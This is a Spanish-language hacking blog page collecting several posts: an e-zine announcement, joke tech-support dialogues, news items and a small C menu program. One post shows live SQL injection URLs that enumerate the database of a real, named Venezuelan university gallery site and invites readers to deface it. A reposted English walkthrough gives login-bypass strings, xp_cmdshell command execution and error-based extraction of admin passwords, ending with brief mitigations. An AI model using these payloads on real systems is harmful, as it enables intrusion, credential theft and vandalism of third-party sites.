White Shadow Primera ediccion

 

 Liberada la primera H-zine de la comunidad de BugBox ,  en la revista se tratan buenos temas y como siempre digo no esta demas leer siempre se aprende algo y que mejor que sea de gente que a estado en los temas de seguridad y contraseguridad informatica.

 INDICE: 

- Hacking Google (Hacking)
- Los Antivirus (Seguridad Informatica)
- Introduccion a la Programacion .NET (Programacion General)
- Batch Part. I (Programacion Scripting)
- Conceptos Basicos (Bug & Exploits)
- Atacando sistemas informacion webs basados en Cookies (BuG & Exploits)
- Introduccion a la Seguridad Web (Seguridad Web)
- HTML (Programacion Web)
- Introduccion a la Redes Informaticas (Redes)
- Mantener en buen estado la PC (Mantenimiento de PC's)
- Crear un texto con un efecto fuego realista. (Diseño Grafico)
- Diseño Blending para Web’s 2.0 (Diseño Grafico)
- Cambiar el color de Ojos (Diseño Grafico)
- Despedida

 
Descarga:
http://www.megaupload.com/?d=3LKL63GE

Espero que les guste, pronto habra otra entrega.

Saludos.

Cambios recientes en WHMD™

Una vez mas, tratando de mejorar un poquito las cosas, el blog ha sufrido ciertos cambios y acontinuacion dejo los detalles.

Comentarios.

Esto, se debe a que antes del dia de hoy los visitantes anonimos no podian dejar comentarios, para ello debian poseer una cuenta registrada en google u otro servicio gratis disponible.

Ahora ya no se necesita eso, he cambiado la configuración para que los visitantes anonimos puedan dejar sus comentarios, jeje asi que espero un monton de comentarios xD's.

Feed del blog.

Este se trata de un nuevo gadget que he agregado al blog de modo que los visitantes puedan suscribirse y esten al dia de las publicaciones que yo valla haciendo en este blog, jeje como siempre espero que mas de alguno se suscriba, solo den clic a la imagen y suscribanse los que gusten.

WHMD™ Total Visits.

Este se trata de un contador de visitas en tiempo real que ha reemplazado al anterior, espero que ahora le guste mas a los visitantes y asi yo tambien puedo ver de que paises visitan este blog.

Es todo por el momento, y como siempre los cambios siempre son para mejorar y en eso estamos, mejorando cada dia.

Saludos a todos lo que visitan mi blog, que tengan buen dia o buenas noches, jeje.

Bug en Galeria universitaria Braulio Salazar en Venezuela.

Website: http://galeria.uc.edu.ve/

http://galeria.uc.edu.ve/noticias.php?id=66%20order%20by%204-- Uiltima columna

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,2,3,4-- Me tira 2 y 3, pero prefiero el 2

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,version(),database(),4-- Version y nombre de base de datos

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,user(),database(),4-- Usuario y base de datos

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables-- Lista de tablas.

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=char(117,115,117,97,114,105,111,115)-- Lista de las columnas

Buscando columanas 1 a 1
http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,table_name,3,4%20from%20information_schema.tables%20limit%200,1--

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,table_name,3,4%20from%20information_schema.tables%20limit%200,1-- La primer columna.

http://galeria.uc.edu.ve/noticias.php?id=-66%20union%20all%20select%201,table_name,3,4%20from%20information_schema.tables%20limit%2021,1-- Columna 21 = usuarios

El problema es ha la hora de hacer las consultas, por ejemplo:

http://galeria.uc.edu.ve/noticias.php?id=-1%20union%20all%20select%201,usuario,3,4%20from%20usuarios--

Me sale dice que la tabla usuarios no existe
 
Table 'avantpix_gubs.usuarios' doesn't exist

Si alguien sabe como seguir adelante y quien quiera hacerle deface, que le de mandarin jeje, ha decir verdad yo tuve problemas para acceder a esa web, pero si alguien puede entrar son libres de darle OWNED.

Saludos especiales a mis amigos de venezuela xD.

Conversaciones telefonicas con un servicio técnico informático

Hoy que estaba revisando un disco de respaldo que tenia desde hace varios meses o talvez años, jeje, encontre un archivo que tenia unas conversaciones chistosas de usuarios informaticos y tecnicos de servicios, jeje ahi lo dejo pa que se rian un ratito.

Caso 1
Técnico de Servicio: ¿Qué ordenador tiene?
Usuaria: Uno blanco
Técnico de Servicio: (Silencio)

Caso 2
Usuario: ¡Hola!. No puedo sacar el disquete de la disquetera.
Técnico de Servicio: ¿Ha intentado apretar el botón?
Usuario: Sí, claro, está como pegado…
Técnico de Servicio: Eso no suena bien, tomaré nota.
Usuario: No… Espera… No había metido el disquete… está todavía en la mesa…, gracias.

Caso 3
Técnico de Servicio: Haga clic sobre el ícono de ‘Mi PC’, a la izquierda de la pantalla.
Usuaria:¿Su izquierda o mi izquierda?

Caso 4
Técnico de Servicio: Buenos días, ¿en qué puedo ayudarle?
Usuario: Hola, no puedo imprimir.
Técnico de Servicio: Por favor dé clic en ‘inicio’ y…
Usuario: Escuche, no empiece con tecnicismos, no soy experta en ordenadores. ¡Coño!

Caso 5
Usuaria: Hola, buenas tardes, no puedo imprimir, cada vez que lo intento dice ‘No se encuentra impresora’. He cogido incluso la impresora, la he colocado en frente del monitor pero el ordenador todavía dice que no la puede encontrar.

Caso 6
Usuario: Tengo problemas para imprimir en rojo.
Técnico de Servicio: ¿Tiene una impresora a color?
Usuario: No, la mía es blanca.

Caso 7
Técnico de Servicio: ¿Qué ve en su monitor ahora mismo?
Usuario: Un osito de peluche que mi novio me compró.

Caso 8
Técnico de Servicio: Ahora, pulse F8..
Usuaria: No funciona.
Técnico de Servicio: ¿Qué hizo exactamente?
Usuaria: Presionar la F y la 8 veces como me dijiste, pero no ocurre nada.

Caso 9
Usuaria: Mi teclado no quiere funcionar.
Técnico de Servicio: ¿Está segura de que está conectado?
Usuaria: No lo sé. No alcanzo la parte de atrás.
Técnico de Servicio: Coja el teclado y dé diez pasos hacia atrás.
Usuaria: Ok.
Técnico de Servicio: ¿El teclado sigue con usted?
Usuaria: Sí.
Técnico de Servicio: Eso significa que el teclado no está conectado ¿Hay algún otro teclado?
Usuaria: Sí, hay otro aquí. Huy,…. ¡¡¡Este sí funciona!!!

Caso 10
Técnico de Servicio: Tu password es ‘a’ minúscula de andamio, V mayúscula de Víctor, el número 7…
Usuario: ¿7 en mayúscula o minúscula?

Caso 11
Usuaria: No puedo conectarme a Internet, aparece error de clave.
Técnico de Servicio: ¿Está segura de que está utilizando el password correcto?
Usuaria: Sí, estoy segura, ví a mi esposo escribirlo.
Técnico de Servicio: ¿Me puede decir cuál era el password?
Usuaria: 5 asteriscos.

Caso 12
Usuaria: Tengo un grave problema. Un amigo me puso un protector de pantalla, pero cada vez que muevo el ratón desaparece…

Caso 13
Usuario: No logro encontrar el simbolito para abrir el Word.
Técnico de Servicio: Mire en el escritorio. ¿Qué tiene ahí?
Usuario: Muchos papeles y mi bolso. 

jejeje, espero que les guste.

Dejen sus comentarios xD.  

[Recopilación] Instalación de BackTrack 4

 Hace un par de meses tuve la oportunidad de instalar BackTrack en mi computador.

Hoy via mail, un amigo me pregunto algo sobre la instalación de BackTack, por lo que decidi googlear buscando info, y aqui os dejo lo que encontre.

Es una recopilación sencilla, pero a alguno podria serle util.

Manual BackTrack

Tutorial - Instalar Back Track 4

Video Tutorial: Instalación de BackTrack 4

Instalar Back | Track en el HD de tú PC 

SQL Injection Walkthrough

1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the

and

have potential parameters that might be useful (exploit wise).


2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
 - Login: hi' or 1=1--
 - Pass: hi' or 1=1--
 - http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
 - Input from users
 - Parameters from URL
 - Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask


9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml

Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm 

Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
 

http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
 

http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
 

http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

 Font: securiteam.com

Seis de cada diez compañías dicen "no" a Windows 7

Seis de cada diez compañías planean no comprar el sistema operativo Windows 7 de Microsoft, muchas de ellas para ahorrar dinero y otras tantas por preocupaciones sobre la compatibilidad del producto con sus aplicaciones actuales, según reveló una encuesta.

Windows 7 será lanzado el 22 de octubre pero ya ha recibido buenas críticas, en contraste con la decepcionante versión actual del sistema, Windows Vista.

Muchas de las más de 1.000 compañías que respondieron a la encuesta de ScriptLogic dicen que han economizado haciendo recortes en actualizaciones de software y carecen de recursos para adquirir las últimas ofertas de Microsoft.

ScriptLogic, que ofrece ayuda a compañías para gestionar sus redes basadas en Windows, envió 20.000 encuestas a encargados de áreas de tecnología de la información para conocer el estado del mercado. Muchas compañías han rechazado Windows Vista por inestable.

Por ejemplo, el fabricante de chips Intel -socio de Microsoft desde hace tiempo en la fabricación de ordenadores personales- ha permanecido con el antiguo sistema XP.

El sondeo determinó que alrededor del 60% de los encuestados no tienen planes de instalar Windows 7, 34% lo hará para fines de 2010, y sólo el 5,4% lo hará antes de fin de año. El 42% dijo que la mayor razón para no adoptar Windows 7 era la "falta de tiempo y recursos".

Eso se encadena con otra parte de la encuesta, que halló que el 35% ya había pasado por alto actualizaciones o postergó compras para ahorrar dinero. Pero hubo otras razones aparte del dinero para mantenerse al margen del Windows 7. Otro 39% de los encuestados dijo que tenía dudas acerca de la compatibilidad de Windows 7 con las aplicaciones existentes.

Font: www.publico.es 

Hacker se declara culpable por robar millones de tarjetas de crédito

Un pirata informático de 28 años se declaró el viernes culpable de uno de los delitos de robo de identidades más grandes que se conocen, y dejó a una jueza federal con el problema de decidir cómo compensar a sus millones de víctimas.

Documentos presentados el mes pasado ya habían mostrado que Albert Gonzalez, de Miami, se declararía culpable de los cargos de los que se le acusa en Massachusetts y Nueva York de que ayudó a crear una red mundial que robó más de 40 millones de tarjetas de crédito y débito de grandes cadenas de tiendas, incluyendo TJX Cos, empresa matriz de T.J. Maxx y Marshalls. 

González es un viejo conocido de la justicia en EE UU, hasta el punto de que en 2004 hizo de informante federal en un caso de fraude similar que llevó al arresto de 28 individuos. Pero lo que no sabían los investigadores es que estaba anticipando sus movimientos a otros criminales. En mayo de 2008 fue arrestado por el que fue calificado como el mayor robo de datos personales en EE UU.

Leer mas...

Se detectó una botnet de servidores Linux

¿Cómo? Eso suena más a plataformas Windows, en eso todos estamos de acuerdo, pero recientes informes de varios sitios diferentes han revelado la existencia de unabotnet que ha tomado bajo su control a aproximadamente cien servidores Linux de diferentes distros. La botnet estaría infectando a sistemas Windows, entregando contenido a través de un servidor web que utiliza el puerto 8080. Muchos se han apresurado a decir que Linux al final no es tan seguro como sus usuarios dicen, pero lo cierto es que sólo una cosa puede haber provocado que cien servidores terminen infectados, y es un mal administrador de sistema. Si siempre se preguntaron por qué las distros insisten en no usar la cuenta root para tareas mundanas, esta es una de las razones.

Via: http://www.neoteo.com/se-detecto-una-botnet-de-servidores-linux.neo

Una maestra quedaría presa por tener sexo con un alumno

Quince años de prisión es la pena que la Fiscalía pidió para María Eugenia Darrigrande Moreno, una maestra de 46 años que entre septiembre y noviembre de 2007 mantuvo relaciones sexuales con S.A.J.S., uno de sus alumnos del sexto año básico de un colegio del sector santiaguino de Recoleta.

Las relaciones ocurrieron en el departamento de la profesora y en el propio colegio, según el fallo del II Tribunal Oral en lo penal de la capital chilena.??Los jueces determinaron que mientras la acusada era Profesora Jefe del 6° año básico A y Jefe de Unidad Técnica Pedagógica del citado establecimiento educacional, "realizó actos de significación sexual consistentes en besos en la boca a su alumno, tocaciones en su cuerpo y penetración vía vaginal del menor a la imputada".??

Durante el juicio, la mujer admitió haber mantenido relaciones sexuales con el menor y aseguró que en un momento vio al escolar como su pareja y que llegó a enamorarse de forma platónica.??La maestra justificó su actuar diciendo que en ese momento padecía de angustia y depresión debido a problemas personales, mientras la Fiscalía dijo que para mantener a su lado al niño la mujer le hizo creer que estaba embarazada.??También le dijo que tenía amigos que matarían a su familia si el menor la abandonaba y que ella también se mataría, según el expediente del caso.?

?La Fiscalía fundamentó su petición de una pena de 15 años en el hecho de que la profesora era una figura de autoridad frente al menor, mientras la defensa argumentó que ella estaba realmente enamorada y por ello no hubo dolo en sus actos.??El niño, que declaró en el juicio a través de un circuito cerrado de televisión, planteó que la relación comenzó en agosto de 2007 y que entre septiembre y el 23 de noviembre de ese año mantuvo relaciones sexuales cada viernes con la profesora.??"Siento que me destruyó la vida.

 Al principio me sentí culpable, pero después, con ayuda sicológica, no. Incluso me amenazó con que si yo contaba lo ocurrido, iba a matar a su familia y que se iba a matar ella", señaló el menor.??La sentencia del juicio se dará a conocer el próximo 17 de septiembre, dijeron fuentes del tribunal.

Via:  http://ethical-security.co.cc/Forum/index.php?topic=402.0

Menu tipo notepad.exe

// Muestra un menu de color
// 8 opciones.
// http://.whmd.blogspot.com

#include <stdio.h> // Funciones para entrada y salida
#include <conio.h> // Funciones para manipulacion de pantalla

int main()
{
 int l;
 char o;
  textbackground(BLUE);
  textcolor(WHITE);
  clrscr(); // Para limpiar pantalla
  do
  {
 window(3,3,80,13);
 cprintf("1.- Archivo\r\n");
 cprintf("2.- Nuevo\r\n");
 cprintf("3.- Abrir...\r\n");
 cprintf("4.- Guardar\r\n");
 cprintf("5.- Guardar como...\r\n");
 textcolor(LIGHTGRAY); for (l=1;l<=15;l++) cprintf("-"); // 20 Guiones
 textcolor(WHITE);
 cprintf("\r\n6.- Configurar p gina...\r\n");
 cprintf("7.- Imprimir...\r\n");
 textcolor(LIGHTGRAY); for (l=1;l<=15;l++) cprintf("-"); // 20 Guiones
 textcolor(WHITE);
 cprintf("\r\n0.- Salir\r\n");
 textcolor(YELLOW); for (l=1;l<=20;l++) cprintf("þ");
 textcolor(WHITE);
  o=getchar();
  switch(o)
  {
 case '1': gotoxy(30,1); printf("Archivo");
  break;
 case '2': gotoxy(30,2); printf("Nuevo");
  break;
 case '3': gotoxy(30,3); printf("Abrir...");
  break;
 case '4': gotoxy(30,4); printf("Guardar");
  break;
 case '5': gotoxy(30,5); printf("Guardar como...");
  break;
 case '6': gotoxy(30,6); printf("Configurar p gina");
  break;
 case '7': gotoxy(30,7); printf("Imprimir...");
  break;
 }
  }
  while(o!='0');
  return 0;
}